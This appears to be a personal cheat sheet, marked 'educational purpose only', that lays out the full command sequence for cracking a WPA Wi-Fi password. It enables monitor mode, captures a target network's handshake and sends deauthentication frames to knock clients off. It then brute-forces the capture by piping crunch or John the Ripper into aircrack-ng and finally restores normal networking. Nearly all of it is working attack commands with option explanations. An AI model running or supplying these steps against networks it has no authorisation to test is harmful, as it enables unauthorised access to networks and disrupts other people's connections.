--Educational purpose only--
1.airmon-ng start wlan0
after this a few need to get killed, so to enter monitor mode. The wifi icon got disappeared.2. airodump-ng wlan0 (can be other name like wlan0mon)
3. airodump-ng -c 11 -w WPA110 --bssid 80:89:17:41:DD:E0 wlan0
this step should be running
4. aireplay-ng -0 1 -a bssid? -c clientStation?
after a few times of 4, you should see handshake in 3, and stop both 3 and 4.
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
-
-0 means deauthentication
-
1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
-
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-
-c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
-
ath0 is the interface name
5.crunch 8(the min) 8 (the max) abcd(the combine)|aircrack-ng YY_crack-01.cap -b bSSID? -w-
SHOULD HAVE USED WITH JOHN THE RIPPER!!!!! OTHERWISE CANNOT PAUSE...
john --session=foo --stdout --wordlist=wordlist.dic | aircrack-ng -w - -b 00:11:22:33:44:55 WPAcrack.cap
Option | Description |
---|---|
--session | The name of the session |
--wordlist | The name of the dictionary file |
-b | The MAC address of the access point |
WPAcrack.cap | The name of the file that contains the authentication handshake |
Press q or Ctrl-C to pause, then
john --restore=foo | aircrack-ng -w - -b 00:11:22:33:44:55 WPAcrack.cap
Credits: https://www.shellhacks.com/pause-resume-aircrack-ng/
Now, we gotta recover wifi so to get reconnected, i.e.managed mode:
1. ifconfig wlan0 down
2. iwconfig wlan0 mode managed
3. ifconfig wlan0 up
4. /etc/init.d/networking restart
5./etc/init.d/network-manager restart
Done!